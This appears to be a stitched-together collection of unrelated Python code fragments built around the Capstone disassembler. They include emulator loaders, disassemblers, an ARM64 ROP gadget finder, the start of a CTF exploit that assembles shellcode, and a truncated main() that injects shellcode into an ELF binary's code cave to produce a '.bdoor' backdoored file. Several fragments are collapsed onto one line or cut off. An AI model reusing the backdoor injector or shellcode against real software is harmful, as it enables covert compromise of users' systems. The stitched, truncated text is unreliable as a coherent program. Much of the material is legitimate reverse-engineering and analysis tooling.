def _gadget_insn_matches(pattern, insn):
    """Return True when one disassembled instruction matches one gadget pattern.

    ``pattern`` is a ``(mnemonic, op_str)`` pair of already-stripped strings.
    """
    mnemonic, op_str = pattern
    if mnemonic != insn.mnemonic.strip():
        return False
    insn_ops = insn.op_str.strip()
    if mnemonic == "cbz" and op_str.split(",")[0] == insn_ops.split(",")[0]:
        # For cbz only the first operand has to agree; the branch target
        # is deliberately ignored.
        return True
    return op_str == insn_ops


def find_gadget(fname, gadget_arg):
    """Find an instruction sequence in the ``.text`` section of an ARM64 ELF.

    ``gadget_arg`` is a ``;``-separated list of instructions, each written as
    ``mnemonic operands`` in the textual form produced by the disassembler.
    Hits are cached in ``<fname>.gadgets.json`` (created when missing) and
    served from there on later calls.

    :param fname: path of the ELF file to search
    :param gadget_arg: gadget description, e.g. ``"ldr x0, [x1]; ret"``
    :return: virtual address of the first match, or ``None`` after printing
        ``FAILED <gadget_arg>`` when nothing matches
    """
    cache_path = fname + ".gadgets.json"
    if os.path.isfile(cache_path):
        with open(cache_path, "r") as f:
            cache = json.loads(f.read())
        if gadget_arg in cache:
            # The cached address is intentionally masked in the output.
            print("Cache gadget 0x %s   %s" % ("*" * 16, "*" * 16))
            return cache[gadget_arg]
    else:
        with open(cache_path, "w") as f:
            f.write("{}")

    # Load ELF; the handle is closed as soon as .text has been copied out.
    data = None
    addr = 0
    with open(fname, "rb") as fd:
        elf = elffile.ELFFile(fd)
        for idx in range(elf.num_sections()):
            section = elf.get_section(idx)
            if section.name == ".text":
                data = section.data()
                addr = section.header["sh_addr"]
                break

    # Clean up the gadget: drop empty entries, trim whitespace, and split
    # every instruction into (mnemonic, operands) once, outside the hot loop.
    gadget = [part.strip() for part in gadget_arg.split(";")
              if part.strip() != ""]
    patterns = [(instr.split(" ")[0].strip(),
                 " ".join(instr.split(" ")[1:]).strip())
                for instr in gadget]

    if data is None or not patterns:
        # No .text section, or nothing to search for.
        print("FAILED %s" % (gadget_arg,))
        return None

    # Iterate over the .text section; every instruction is 4 bytes wide.
    md = cs.Cs(cs.CS_ARCH_ARM64, cs.CS_MODE_ARM)
    i = 0
    while i < len(data):
        asm = list(md.disasm(data[i:], addr + i))
        if len(asm) < len(patterns):
            # Too few decodable instructions here; skip one word and retry.
            i += 4
            continue

        # Only start positions that leave room for the whole gadget are
        # tried, so asm[j + k] can never run past the end of the list.
        for j in range(len(asm) - len(patterns) + 1):
            if all(_gadget_insn_matches(patterns[k], asm[j + k])
                   for k in range(len(patterns))):
                found_addr = i + (j * 4) + addr
                print("Found gadget %s %s" % (hex(found_addr),
                                              ";".join(gadget)))
                # Save to cache
                with open(cache_path, "r") as f:
                    cache = json.loads(f.read())
                cache[gadget_arg] = found_addr
                with open(cache_path, "w") as f:
                    f.write(json.dumps(cache))
                return found_addr

        i += len(asm) * 4

    print("FAILED %s" % (gadget_arg,))
    return None
def find_idausr_offset(ida_path):
    """Locate an image-relative offset reached through the 'IDAUSR' string.

    The binary at ``ida_path`` is parsed with lief and searched in two steps:

    1. find a RIP-relative ``lea`` (REX.W prefixed) whose target is the
       address of the ``IDAUSR`` string, looking in the 30 bytes before each
       ``\\x84\\xc0`` byte pair in ``.text``;
    2. starting at that position and for at most 0x10000 bytes, find a
       RIP-relative ``lea`` whose destination register is RAX, looking in the
       30 bytes before each ``\\xc3`` byte.

    :param ida_path: path of the binary to analyse
    :return: target address of the second ``lea`` minus the image base

    NOTE(review): this is Python 2 code (``print`` statements, ``str`` used as
    a byte string). ``text``/``code``/``string`` are only bound when the
    corresponding section or string is found, and ``like_yara`` returns
    ``None`` when nothing matches, so a miss surfaces as NameError/TypeError.
    """
    ida = lief.parse(ida_path)
    # Two decoders: a cheap one for scanning, one with operand details.
    cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
    csDetails = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
    csDetails.detail = True
    imagebase = ida.optional_header.imagebase
    for sect in ida.sections:
        if sect.name == '.text':
            text = sect
            code = str(bytearray(text.content))
        value = sect.search('IDAUSR')
        # Any other value is taken as a hit (presumably 0xffff... is the
        # library's "not found" result -- confirm against lief).
        if value != 0xffffffffffffffff:
            string = sect.virtual_address + imagebase + value

    def search(code, addr, offset, size, target):
        # Disassemble from `offset` for up to `size` bytes and return the
        # first RIP-relative `lea` accepted by `target`; offsets already
        # decoded are skipped through the shared `visited` list.
        end = offset + size
        if visited[offset]:
            return
        while offset <= end:
            if visited[offset]:
                break
            loop = False
            for insn in (cs.disasm(code[offset:offset + 15], addr + offset)):
                if visited[offset]:
                    break
                visited[offset] = True
                if insn.bytes[0] == 0x48 and insn.mnemonic == 'lea':
                    # Decode again with details enabled to get operands.
                    details = next(
                        csDetails.disasm(str(bytearray(insn.bytes)),
                                         insn.address))
                    ops = details.operands
                    if ops[1].mem.base == capstone.x86_const.X86_REG_RIP:
                        if target(details):
                            print 'Found:',
                            print hex(details.address),
                            print details.mnemonic, details.op_str
                            return details
                offset = insn.address + insn.size - addr
                loop = True
            if not loop:
                # Nothing decoded at this offset: mark it and move one byte.
                visited[offset] = True
                offset += 1

    def like_yara(delim, target, start=0, end=None):
        # For every occurrence of `delim` in [start, end) try the 30 start
        # offsets before it; returns (instruction, start offset) on a hit.
        global visited
        visited = [None] * len(code)
        cur = code.find(delim, start)
        if end is None:
            end = len(code)
        while cur != -1 and cur < end:
            for i in range(30):
                res = search(code, text.virtual_address + imagebase, cur - i,
                             i, target)
                if res:
                    return res, cur - i
            cur = code.find(delim, cur + 1)

    # Step 1: code offset of the lea that points at the 'IDAUSR' string.
    func = like_yara(
        '\x84\xc0', lambda insn: insn.address + insn.size + insn.operands[1].
        mem.disp == string)[1]
    # Step 2: lea into RAX found within 0x10000 bytes after that offset.
    ret = like_yara(
        '\xc3',
        lambda insn: insn.operands[0].reg == capstone.x86_const.X86_REG_RAX,
        func, func + 0x10000)[0]
    # lea rax, [rip + offset]
    offset = ret.address + ret.size + ret.operands[1].mem.disp
    offset -= imagebase
    print 'offset:', hex(offset)
    return offset
try: import capstone except ImportError: sys.exit(-1) # Capstone is not installed file_path = sys.argv[1] offset = int(sys.argv[2]) arch = int(sys.argv[3]) mode = int(sys.argv[4]) try: # Receive data from temporary file with open(file_path, "rb") as f: data = f.read() md = capstone.Cs(arch, mode) end = 0 address = [] mnemonic = [] op_str = [] code_hex = [] for i in md.disasm(data, offset): s = binascii.b2a_hex(i.bytes).decode().upper() code_hex.append(" ".join([s[j:j + 2] for j in range(0, len(s), 2)])) address.append(i.address) mnemonic.append(i.mnemonic) op_str.append(i.op_str) end = i.address + i.size max_len_address = 0 max_len_mnemonic_op = 0
# A gdb web UI running /bin/sleep. Can you pwn it? # """ # https://twitter.com/_tsuro/status/1341445230436999172 # https://github.com/sroettger/play-my-challenge # # pip3 install capstone keystone-engine unicorn python-socketio websocket-client import socketio import time import os import sys import keystone import capstone from unicorn import * from unicorn.x86_const import * cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64) def open_read_payload(): return ( # 'a' = 0x61 'add al, 1', 'add al, 1', 'sub rsp, 8', 'push rsp', 'add al, 0xf', 'add al, 0x2f', 'add al, 8', 'add al, 0x18', 'pop rdi',
#!/usr/bin/env python3 from sys import argv from os import path import capstone from elftools.elf.elffile import ELFFile from elftools.elf.sections import SymbolTableSection from panda import Panda, blocking, ffi from panda.helper.x86 import R_EAX, R_EBX, R_ECX, registers # Single arg of arch, defaults to i386 arch = "i386" if len(argv) <= 1 else argv[1] panda = Panda(generic=arch) md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32) bin_dir = "taint" bin_name = "taint_asm" assert (path.isfile(path.join(bin_dir, bin_name))), "Missing file {}".format( path.join(bin_dir, bin_name)) # Take a recording of toy running in the guest if necessary recording_name = bin_dir + "_" + bin_name if not path.isfile(recording_name + "-rr-snp"): @blocking def run_it(): panda.record_cmd(path.join(bin_dir, bin_name), copy_directory=bin_dir, recording_name=recording_name) panda.stop_run()
def load_module(self, path=None, data=None):
    """
    Load a module into the emulator space from the specified path

    :param path: file system path of the PE to load; used when ``data`` is
        empty
    :param data: raw bytes of the PE; when given, the module is named after
        the SHA-256 of these bytes
    :return: the PE object returned by ``self.load_pe``
    :raises Win32EmuError: if the PE architecture is neither x86 nor amd64
    """
    pe = self.load_pe(path=path, data=data,
                      imp_id=w32common.IMPORT_HOOK_ADDR)

    if pe.arch == _arch.ARCH_X86:
        disasm_mode = cs.CS_MODE_32
    elif pe.arch == _arch.ARCH_AMD64:
        disasm_mode = cs.CS_MODE_64
    else:
        # Interpolate the value; passing it as a second exception argument
        # leaves the '%s' placeholder unformatted in the message.
        raise Win32EmuError('Unsupported architecture: %s' % pe.arch)

    if not self.arch:
        self.arch = pe.arch
        self.set_ptr_size(self.arch)

    self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch)

    if not self.disasm_eng:
        self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode)

    if not data:
        file_name = os.path.basename(path) + '.exe'
        mod_name = os.path.splitext(file_name)[0]
    else:
        mod_hash = hashlib.sha256()
        mod_hash.update(data)
        mod_hash = mod_hash.hexdigest()
        mod_name = mod_hash
        file_name = '%s.exe' % (mod_name)

    self.api = WindowsApi(self)

    cd = self.get_cd()
    if not cd.endswith('\\'):
        cd += '\\'
    emu_path = cd + file_name

    if not data:
        with open(path, 'rb') as f:
            data = f.read()
    # Make the module contents visible to the emulated file system.
    self.fileman.add_existing_file(emu_path, data)

    # Strings the initial buffer so that we can detect decoded strings later on
    if self.profiler and self.do_strings:
        self.profiler.strings['ansi'] = self.get_ansi_strings(data)
        self.profiler.strings['unicode'] = self.get_unicode_strings(data)

    # Set the emulated path
    emu_path = ''
    self.cd = self.get_cd()
    if self.cd:
        if not self.cd.endswith('\\'):
            self.cd += '\\'
        emu_path = self.cd + os.path.basename(file_name)

    pe.set_emu_path(emu_path)
    self.map_pe(pe, mod_name=mod_name, emu_path=emu_path)
    self.mem_write(pe.base, pe.mapped_image)

    self.setup()

    if not self.stack_base:
        self.stack_base, stack_addr = self.alloc_stack(0x12000)
    self.set_func_args(self.stack_base, self.return_hook)

    # Init imported data
    for addr, imp in pe.imports.items():
        mn, fn = imp
        mod, eh = self.api.get_data_export_handler(mn, fn)
        if eh:
            data_ptr = self.handle_import_data(mn, fn)
            sym = "%s.%s" % (mn, fn)
            self.global_data.update({addr: [sym, data_ptr]})
            # Store the pointer at the import slot, little-endian and
            # pointer-sized.
            self.mem_write(
                addr,
                data_ptr.to_bytes(self.get_ptr_size(), 'little'))
    return pe
args = parser.parse_args() if (args.debug): l = logging.DEBUG else: l = logging.INFO logging.basicConfig(stream=sys.stdout, level=l, format='%(filename)s : %(asctime)s : %(message)s', datefmt='%d/%m/%y @ %H:%M:%S') # create emulator and disassembler emu = unicorn.Uc(unicorn.UC_ARCH_ARM, unicorn.UC_MODE_THUMB) asm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) if (args.target == 'lpc1114fn28'): emu.mem_map(0x00000000, 32 * 1024) # Figure 6: 32 kB => flash emu.mem_map(0x10000000, 4 * 1024) # Figure 6: 4 kB => SRAM emu.mem_map(0x1FFF0000, 16 * 1024) # Figure 6: 16 kB => boot ROM emu.mem_map(0x40000000, 512 * 1024) # Figure 6: 512 kB => APB peripheral bus emu.mem_map(0x50000000, 2 * 1024 * 1024) # Figure 6: 2 MB => AHB peripheral bus emu.mem_map(0xE0000000, 1 * 1024 * 1024) # Figure 6: 1 MB => private peripheral bus elif (args.target == 'lpc1313fbd48'): emu.mem_map(0x00000000, 32 * 1024) # Figure 14: 32 kB => flash emu.mem_map(0x10000000, 8 * 1024) # Figure 14: 8 kB => SRAM
def arm_process(filename):
    """
    Disassemble the binary processing
        PC relative loads
            ldr.w ip, [pc, #16]
        library function invocations
            blx #0x10a40 <strcmp@plt>
        inline jump tables
            tbh [pc, r3, lsl #1]
            .short 0x0123
            ...
        or
            add r2, pc, #4
            ldr pc, [r2, r3, lsl #2]
            .word 0x00010545
            ...

    The ``.text`` section is decoded linearly in Thumb mode. PLT symbol names
    are read from ``plts.info`` and the annotated listing is written to
    ``instrs.info`` in the current directory. If a PC-relative load pointing
    backwards is seen, the listing is regenerated once from the start with the
    inline-data locations collected so far.

    :param filename: path to target executable
    """
    # Open ELF executable, read info and read raw binary .text section
    with open(filename, 'rb') as f:
        raw = f.read()
        f.seek(0)
        textsec = ELFFile(f).get_section_by_name('.text')
        textsec.addr = textsec.header['sh_addr']
        textsec.size = textsec.header['sh_size']
        textsec.offset = textsec.header['sh_offset']
    textraw = raw[textsec.offset:textsec.offset + textsec.size]
    # plts.info: one "<hex address> <name>:" entry per line.
    with open('plts.info') as f:
        plts = {
            int(l.split()[0], 16): ' ' + l.split()[1].rstrip(':')
            for l in f
        }
    dis = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB)
    dis.syntax = capstone.CS_OPT_SYNTAX_ATT
    inlinedata = {}  # address -> size in bytes of data embedded in the code
    negpcrel = False  # a PC-relative load pointed before the current offset
    secondpass = True  # a second pass is still allowed
    last_cmp = ('', '')  # operands of the most recent cmp
    last_adr_dest = 0  # destination computed for the most recent adr
    last_adr_reg = None  # register written by the most recent adr
    pcrelre = re.compile('\[pc,\s*\#(\-?0x[0-9a-f]+)\]', re.I)
    pcreltblre = re.compile(
        '\[pc,\s*(r[0-9]+)(,\s*lsl \#1)?\]|pc,\s*\[r[0-9]+,\s*(r[0-9]+|fp|lr|sb|sl),\s*lsl\s*\#2\]',
        re.I)
    pcreladdre = re.compile('^(r[0-9]+|fp|lr|sb|sl),\s*pc,\s*\#(0x[0-9a-f]+)$',
                            re.I)
    baseregre = re.compile('\[([^,]+),?.*\]', re.I)
    calls = set(('bl', 'blx'))
    offtableop = set(('tbb', 'tbh'))
    f = open('instrs.info', 'w')
    curr_off = 0
    # Linearly disassemble
    while curr_off < textsec.size:
        # e is (address, size, mnemonic, op_str)
        for e in dis.disasm_lite(textraw[curr_off:], textsec.addr + curr_off):
            curr_off += e[1]
            if e[2].split('.')[0] == 'cmp':
                last_cmp = tuple(e[3].split(','))
            instr = ('%x' % e[0]).rjust(8) + ':\t' + e[2].ljust(
                7) + ' ' + e[3].replace(', ', ',').replace(' ', '|')
            m = pcrelre.search(instr)
            if m:
                # Insert label for PC relative loads
                dest = (e[0] & 0xFFFFFFFC) + int(m.group(1), 16) + 4
                if dest < curr_off + textsec.addr:
                    negpcrel = True
                inlinedata[dest] = load_size(e[2], e[3])
                instr = pcrelre.sub('0x%X' % dest, instr)
            elif e[2] in calls and e[3].startswith('#'):
                # Insert plt symbol
                instr += plts.get(int(e[3][1:], 16), '')
            elif e[2].startswith('adr'):
                # Insert label for PC relative add
                const = e[3].split(', ')[1]
                last_adr_dest = (e[0] & 0xFFFFFFFC) + int(const[1:], 16) + 4
                last_adr_reg = e[3].split(',')[0]
                instr = instr.replace(const, '0x%x' % last_adr_dest)
            elif e[2].startswith('addw'):
                # PC relative double loads load address with addw
                m = pcreladdre.search(e[3])
                if m:
                    dest = (e[0] & 0xFFFFFFFC) + int(m.group(2), 16) + 4
                    inlinedata[dest] = 8
                    instr = ('%x' % e[0]).rjust(8) + ':\tadr ' + m.group(
                        1) + (',0x%X' % dest)
            f.write(instr + '\n')
            if e[2] in offtableop or e[2].startswith('ldr'):
                m = pcreltblre.search(e[3])
                if m:
                    # Process inline jumptable
                    offsize, tablesize = eval_tb_size(
                        e[2], last_cmp,
                        m.group(1) if m.group(1) is not None else m.group(3))
                    if offsize > 2:
                        # ldr jumptable
                        last_adr_reg = None
                        for i in xrange(0, tablesize, 4):
                            inlinedata[last_adr_dest + i] = 4
                    else:
                        # tb jumptable
                        tb_process(offsize, curr_off + textsec.addr,
                                   textraw[curr_off:curr_off + tablesize], f)
                        curr_off += tablesize
                        # Restart the decoder after the table.
                        break
                else:
                    # adr + ldr
                    m = baseregre.search(e[3])
                    if m and last_adr_reg == m.group(1):
                        inlinedata[last_adr_dest] = load_size(e[2], e[3])
                        last_adr_reg = None
            if curr_off + textsec.addr in inlinedata:
                # Inline data starts here: stop decoding instructions.
                break
        else:
            # The decoder stopped by itself before the end of the section:
            # record the next 2 bytes as inline data.
            if curr_off < textsec.size:
                inlinedata[curr_off + textsec.addr] = 2
        while curr_off + textsec.addr in inlinedata:
            # Parse inline data
            pc = curr_off + textsec.addr
            size = inlinedata.pop(pc)
            if size == 1:
                # Byte entries are written two at a time.
                vals = unpack('<BB', textraw[curr_off:curr_off + 2])
                f.write(('%x' % pc).rjust(8) + ':\t.byte 0x%x\n' % vals[0])
                f.write(('%x' % (pc + 1)).rjust(8) +
                        ':\t.byte 0x%x\n' % vals[1])
                size = 2
            else:
                if size == 8:
                    # An 8-byte entry is emitted as two words; queue the
                    # second one.
                    inlinedata[pc + 4] = 4
                    size = 4
                val = unpack('<H' if size == 2 else '<I',
                             textraw[curr_off:curr_off + size])[0]
                f.write(('%x' % pc).rjust(8) + ':\t' +
                        ('.short' if size == 2 else '.word').ljust(7) +
                        ' 0x%x\n' % val)
            curr_off += size
        if secondpass and curr_off >= textsec.size and negpcrel:
            # If some PC relative load with negative offsets are found, a second pass is necessary
            secondpass = False
            curr_off = 0
            last_cmp = ('', '')
            last_adr_dest = 0
            last_adr_reg = None
            # Reopen the output to discard what the first pass wrote.
            f.close()
            f = open('instrs.info', 'w')
    f.close()
def load_module(self, path=None, data=None, first_time_setup=True):
    """
    Load a module into the emulator space from the specified path

    :param path: file system path of the PE to load; used when ``data`` is
        empty
    :param data: raw bytes of the PE; when given, the module is named after
        the SHA-256 of these bytes
    :param first_time_setup: when true, the emulation engine (and, if not
        yet present, the disassembler) is initialized; the flag is also
        forwarded to ``self.setup``
    :return: the PE object returned by ``self.load_pe``
    :raises Win32EmuError: if the PE architecture is neither x86 nor amd64
    """
    pe = self.load_pe(path=path, data=data,
                      imp_id=w32common.IMPORT_HOOK_ADDR)

    if pe.arch == _arch.ARCH_X86:
        disasm_mode = cs.CS_MODE_32
    elif pe.arch == _arch.ARCH_AMD64:
        disasm_mode = cs.CS_MODE_64
    else:
        # Interpolate the value; passing it as a second exception argument
        # leaves the '%s' placeholder unformatted in the message.
        raise Win32EmuError('Unsupported architecture: %s' % pe.arch)

    if not self.arch:
        self.arch = pe.arch
        self.set_ptr_size(self.arch)

    # No need to initialize the engine and Capstone again
    if first_time_setup:
        self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch)

        if not self.disasm_eng:
            self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode)

    if not data:
        file_name = os.path.basename(path)
        mod_name = os.path.splitext(file_name)[0]
    else:
        mod_hash = hashlib.sha256()
        mod_hash.update(data)
        mod_hash = mod_hash.hexdigest()
        mod_name = mod_hash
        file_name = '%s.exe' % (mod_name)

    self.api = WindowsApi(self)

    cd = self.get_cd()
    if not cd.endswith('\\'):
        cd += '\\'
    emu_path = cd + file_name

    if not data:
        with open(path, 'rb') as f:
            data = f.read()
    # Make the module contents visible to the emulated file system.
    self.fileman.add_existing_file(emu_path, data)

    # Strings the initial buffer so that we can detect decoded strings later on
    if self.profiler and self.do_strings:
        self.profiler.strings['ansi'] = [
            a[1] for a in self.get_ansi_strings(data)
        ]
        self.profiler.strings['unicode'] = [
            u[1] for u in self.get_unicode_strings(data)
        ]

    # Set the emulated path
    emu_path = ''
    self.cd = self.get_cd()
    if self.cd:
        if not self.cd.endswith('\\'):
            self.cd += '\\'
        emu_path = self.cd + os.path.basename(file_name)

    pe.set_emu_path(emu_path)

    # There's a bit of a problem here: if we cannot reserve memory
    # at the PE's desired base address, and the relocation table
    # is not present, we can't rebase it. So this is going to have to
    # be a bit of a hack for binaries without a relocation table.
    # This logic is really only for child processes, since we're pretty
    # much guaranteed memory at the base address of the main module.
    # 1. If the memory at the child's desired load address is already
    #    being used, remap it somewhere else. I'm pretty sure that
    #    the already-used memory will always be for a module,
    #    since desired load addresses don't really vary across PEs
    # 2. Fix up any modules that speakeasy has open for the parent
    #    to reflect where it was remapped
    # 3. Try and grab memory at the child's desired base address;
    #    if that still isn't possible, we're out of luck
    #
    # But if the relocation table is present, we can rebase it,
    # so we do that instead of the above hack.
    imgbase = pe.OPTIONAL_HEADER.ImageBase
    ranges = self.get_valid_ranges(pe.image_size, addr=imgbase)
    base, size = ranges

    if base != imgbase:
        if pe.has_reloc_table():
            pe.rebase(base)
        else:
            parent_map = self.get_address_map(imgbase)

            # Already being used by the parent, so let's remap the parent
            # Do get_valid_ranges on the parent map size so we get a
            # suitable region for it
            new_parent_mem, unused = self.get_valid_ranges(parent_map.size)
            new_parent_mem = self.mem_remap(imgbase, new_parent_mem)

            # Failed
            if new_parent_mem == -1:
                # XXX what to do here
                pass

            # Update parent module pointer
            for pe_, ranges_, emu_path_ in self.modules:
                base_, size_ = ranges_
                if base_ == imgbase:
                    # Mutating the list is safe only because the loop
                    # stops right after the swap.
                    self.modules.remove((pe_, ranges_, emu_path_))
                    self.modules.append(
                        (pe_, (new_parent_mem, size_), emu_path_))
                    break

            # Alright, let's try to grab that memory for the child again
            ranges = self.get_valid_ranges(pe.image_size, addr=imgbase)
            base, size = ranges

            if base != imgbase:
                # Out of luck
                # XXX what to do here
                pass

    self.mem_map(pe.image_size, base=base,
                 tag='emu.module.%s' % (mod_name))

    self.modules.append((pe, ranges, emu_path))
    self.mem_write(pe.base, pe.mapped_image)

    self.setup(first_time_setup=first_time_setup)

    if not self.stack_base:
        self.stack_base, stack_addr = self.alloc_stack(0x12000)
    self.set_func_args(self.stack_base, self.return_hook)

    # Init imported data
    for addr, imp in pe.imports.items():
        mn, fn = imp
        mod, eh = self.api.get_data_export_handler(mn, fn)
        if eh:
            data_ptr = self.handle_import_data(mn, fn)
            sym = "%s.%s" % (mn, fn)
            self.global_data.update({addr: [sym, data_ptr]})
            # Store the pointer at the import slot, little-endian and
            # pointer-sized.
            self.mem_write(
                addr,
                data_ptr.to_bytes(self.get_ptr_size(), 'little'))
    return pe
# def dump_symbols(emulator, fd): for m in emulator.modules: for addr in m.symbol_lookup: v = m.symbol_lookup[addr] fd.write("0x%08X(0x%08X):%s\n" % (addr, addr - m.base, v[0])) # # # g_md_thumb = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB) g_md_thumb.detail = True g_md_arm = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) g_md_arm.detail = True g_md_arm64 = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) g_md_arm64.detail = True def get_module_by_addr(emu, addr): ms = emu.modules module = None for m in ms: if (addr >= m.base and addr <= m.base + m.size): module = m
def __getCs(self, arch):
    """Return a disassembler for ``arch``, reusing the cached one if it fits.

    The cached instance is kept only while both its ``arch`` and ``mode``
    equal those of the requested architecture; otherwise a new one is built
    and stored in its place.
    """
    cached = self.__cs
    if cached and cached.arch == arch.arch and cached.mode == arch.mode:
        return cached

    # Nothing cached yet, or cached for another architecture/mode.
    self.__cs = capstone.Cs(arch.arch, arch.mode)
    return self.__cs
def do_disassembly(address_ptr,
                   dsm_queue,
                   address_map,
                   full_hexdump,
                   res_file,
                   functionname=None):
    """Disassemble one basic block of 32-bit x86 code and queue its successors.

    Decoding starts at ``address_ptr`` and proceeds one instruction at a time
    until a jump, conditional branch, return, a second function prologue
    (``push ebp`` / ``mov ebp, esp``) or undecodable bytes end the block.
    Direct branch and call targets are pushed to ``dsm_queue``; the collected
    block is handed to ``put_data_in_json_file``.

    :param address_ptr: address at which to start decoding
    :param dsm_queue: queue receiving ``[address, functionname]`` entries for
        jump/branch targets and ``[address]`` entries for call targets
    :param address_map: list of ``hex(address)`` strings already visited;
        the start address is appended to it
    :param full_hexdump: hex string of the code, indexed through
        ``get_string_pointer``
    :param res_file: passed through to ``put_data_in_json_file``
    :param functionname: address of the enclosing function; defaults to
        ``address_ptr``
    """
    indirect_controlflows = 0  # +1 if problematic controlflow // not yet handled
    conditional_branch = [
        'jo', 'jno', 'jb', 'jnae', 'jc', 'jnb', 'jae', 'jnc', 'jz', 'je',
        'jnz', 'jne', 'jbe', 'jna', 'jnbe', 'ja', 'js', 'jns', 'jp', 'jpe',
        'jnp', 'jpo', 'jl', 'jnge', 'jnl', 'jge', 'jle', 'jng', 'jnle', 'jg'
    ]
    function_call = ['call', 'callf']
    unconditional_branch = ['jmp', 'jmpf']
    return_instr = ['ret']
    mode = capstone.Cs(capstone.CS_ARCH_X86,
                       capstone.CS_MODE_32)  # set architecture to x86 (32 bit)
    inbasicblock = True
    startofbasicblock = True
    startaddr = 0
    functionentries = 0  # number of function prologues seen in this block
    basicblock = []
    if hex(address_ptr) not in address_map:
        address_map.append(hex(address_ptr))  # mark address as visited
        if functionname is None:
            functionname = address_ptr
        while inbasicblock:
            if startofbasicblock:
                startofbasicblock = False
                startaddr = address_ptr
            # Decode a 7-address window of the hex dump at a time.
            buff = binascii.a2b_hex(full_hexdump[get_string_pointer(
                address_ptr):get_string_pointer(address_ptr + 7)])
            if len(list(mode.disasm(
                    buff, address_ptr))) == 0:  # check if end of instructions
                inbasicblock = False
            else:
                address_ptr_first_instruction = address_ptr
                for instruction in mode.disasm(buff, address_ptr):
                    if instruction.address == address_ptr_first_instruction:  # process only the first instruction found
                        disassembled = hex(
                            instruction.address
                        ) + ' ' + instruction.mnemonic + ' ' + instruction.op_str
                        basicblock.append(disassembled)
                        if len(basicblock) > 1:
                            # The last two entries form a function prologue.
                            if basicblock[len(basicblock) - 2].find("push ebp") > 0 \
                                    and basicblock[len(basicblock) - 1].find("mov ebp, esp") > 0:
                                functionentries += 1
                        if instruction.mnemonic in unconditional_branch:
                            inbasicblock = False
                            if instruction.op_str.find(
                                    'dword ptr') != -1:  # indirect (ptr)
                                indirect_controlflows += 1
                            elif instruction.op_str.find(
                                    '0x') == -1:  # indirect (registers)
                                indirect_controlflows += 1
                            else:
                                dsm_queue.put([
                                    int(instruction.op_str, 16), functionname
                                ])
                        elif instruction.mnemonic in function_call:
                            # A call does not end the block; keep decoding
                            # after it.
                            address_ptr += instruction.size
                            if instruction.op_str.find('dword ptr') != -1:
                                indirect_controlflows += 1
                            elif instruction.op_str.find('0x') == -1:
                                indirect_controlflows += 1
                            else:
                                # Queued without a function name.
                                dsm_queue.put([int(instruction.op_str, 16)])
                        elif instruction.mnemonic in conditional_branch:
                            inbasicblock = False
                            # Queue both the fall-through and the target.
                            dsm_queue.put(
                                [address_ptr + instruction.size, functionname])
                            dsm_queue.put(
                                [int(instruction.op_str, 16), functionname])
                        elif instruction.mnemonic in return_instr:
                            inbasicblock = False
                        elif functionentries > 1:  # another function entry - "backtracing" does not check for lea's
                            inbasicblock = False
                            # Drop the two prologue entries from this block.
                            del basicblock[len(basicblock) -
                                           2:len(basicblock)]
                        else:
                            address_ptr += instruction.size
        put_data_in_json_file(basicblock, hex(startaddr), hex(functionname),
                              res_file)  # slow. do as return value!
After our CPU has been created, allocate memory and set starting state ''' # map 2MB memory for this emulation panda.map_memory("mymem", 2 * 1024 * 1024, ADDRESS) # Write code into memory panda.physical_memory_write(ADDRESS, bytes(encoding)) # Set starting_pc panda.arch.set_pc(cpu, ADDRESS) # Always run insn_exec panda.cb_insn_translate(lambda x, y: True) md = capstone.Cs(capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM) # misp32 @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. ''' if pc >= stop_addr: print("Finished execution") panda.arch.dump_state(cpu) os._exit(0) # TODO: we need a better way to stop here code = panda.virtual_memory_read(cpu, pc, 12) for i in md.disasm(code, pc): print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))
def main():
    """Inject a shellcode into an ELF binary and write ``./<name>.bdoor``.

    The shellcode is wrapped with ``gen_sc_wrapper`` and copied to the file
    offset given by ``args.location``. Control reaches it either through a
    patched ``call`` at ``args.entry`` (the overwritten instructions are
    carried along in the wrapper) or, without ``args.entry``, by redirecting
    the ELF entry point. The program header and section containing the
    location are made readable, writable and executable and may be enlarged
    interactively.

    :return: 0 on success, 1 if the input is not an ELF file, ``None`` when
        the location is rejected
    """
    args = get_args()
    log = Log(True)

    with open(args.binary, "rb") as f:
        binData = f.read()
    elf = ELF(binData)

    with open(args.shellcode, "rb") as f:
        shellcode = f.read()

    loc = int(args.location, 16)
    entry = int(args.entry, 16) if args.entry else None

    if elf.ei_mag != b"\x7f\x45\x4c\x46":
        log.error("Binary is not an ELF file. Exiting...")
        return 1

    # The code cave is safe when every byte the shellcode will cover is
    # null. Check the whole destination range, not just a few offsets.
    safe_cc = not any(elf.elf_file[loc:loc + len(shellcode)])
    if not safe_cc:
        log.warn("Warning: selected codecave doesn't only contain null bytes")

    secid = elf.get_section_id_from_offset(loc)
    phid = elf.get_prog_hdr_id_from_offset(loc)

    # Address the wrapper returns to once the shellcode has run.
    if entry:
        legit_loc = entry
    else:
        if elf.ei_class == ELFHeaderEnum.Class.ELF64.value:
            legit_loc = elf.e_entry
        else:
            legit_loc = elf.e_entry - elf.program_headers[phid].p_vaddr

    sc = gen_sc_wrapper(elf.p("I", legit_loc), elf.p("I", loc+5), shellcode, args.breakpoint, elf.ei_class)

    end_secid = elf.get_section_id_from_offset(loc+len(sc))
    end_phid = elf.get_prog_hdr_id_from_offset(loc+len(sc))

    # NOTE(review): a falsy id is treated as "not found" here and below;
    # confirm the lookup helpers never return index 0 for a valid hit.
    if not phid:
        log.error("Error, location is outside of a program header.")
        return
    elif not end_phid:
